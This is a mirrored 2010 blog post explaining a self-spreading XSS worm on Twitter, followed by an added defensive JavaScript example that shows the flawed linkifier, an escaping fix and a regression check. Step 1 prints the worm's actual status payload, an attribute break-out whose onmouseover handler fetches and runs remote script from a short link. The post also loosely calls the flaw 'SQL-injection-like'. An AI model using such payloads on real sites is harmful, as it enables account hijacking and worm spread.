This is a mirror of the official site: http://jasper-net.blogspot.com/

Write your own Twitter.com XSS exploit

Wednesday, October 13, 2010
So it seems the new twitter.com has a “virus” going around. A few minutes ago my Twitter stream filled up with strange jQuery calls, so I looked into it. Apparently the new Twitter website is vulnerable to a simple SQL-injection-like attack. It’ll just spit out to the page whatever HTML code you write in your status…
So, the exploit works like this:

Step 1:
User writes the following status line:

http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/

The @" basically closes the title attribute of the tweet’s HTML element and lets the hacker add his own attributes: specifically, an onmouseover attribute that’ll run his JavaScript code when a user hovers over the tweet.

Step 2:
The onmouseover event fetches and executes remote JS code from: http://is.gd/fl9A7

Step 3:
The remote script (which is not subject to size limits like the script embedded in the user’s status) can basically do whatever the hacker wants. This one just plays with the page’s HTML to submit a new tweet (from step #1) and spread itself on:

Read more: Developer Zen
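
The attribute break-out from Step 1 and its fix, as an added example that is not part of the original post and not Twitter's actual code. The linkifier functions, the attribute scan and the sample status (same shape as the one above, with a harmless handler) are hypothetical and constructed for illustration.

```javascript
// Added example: a hypothetical tweet linkifier, not Twitter's actual code.
const URL_RE = /https?:\/\/[^\s<>]+/g;

// Vulnerable: the matched text is concatenated into quoted attributes as-is,
// so a double quote inside it ends the attribute and starts new ones.
function linkifyUnsafe(status) {
  return status.replace(URL_RE, (url) =>
    '<a href="' + url + '" title="' + url + '">' + url + '</a>');
}

// Escape the characters that are significant in HTML text and quoted attributes.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: every interpolated value is escaped before it reaches the markup.
function linkifySafe(status) {
  return status.replace(URL_RE, (url) => {
    const e = escapeHtml(url);
    return '<a href="' + e + '" title="' + e + '">' + e + '</a>';
  });
}

// Regression check: list the attribute names found in the first <a> start tag.
// A simplified scan that is sufficient for the output of the two functions above.
function attributeNames(html) {
  const tag = html.match(/<a\b([^>]*)>/);
  if (!tag) return [];
  const attrRe = /([^\s"'=<>\/]+)\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+)/g;
  return [...tag[1].matchAll(attrRe)].map((m) => m[1].toLowerCase());
}

// Constructed sample with the same shape as the status above, harmless handler.
const SAMPLE = 'http://t.co/@"style="color:red"onmouseover="void(0)"/';

// Unsafe output carries injected style/onmouseover attributes.
console.log(attributeNames(linkifyUnsafe(SAMPLE)));
// Safe output carries only the attributes the template wrote.
console.log(attributeNames(linkifySafe(SAMPLE)));
```

A check like attributeNames can run as a unit test over any template that interpolates user text into attributes, failing the build when an unexpected attribute name appears.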
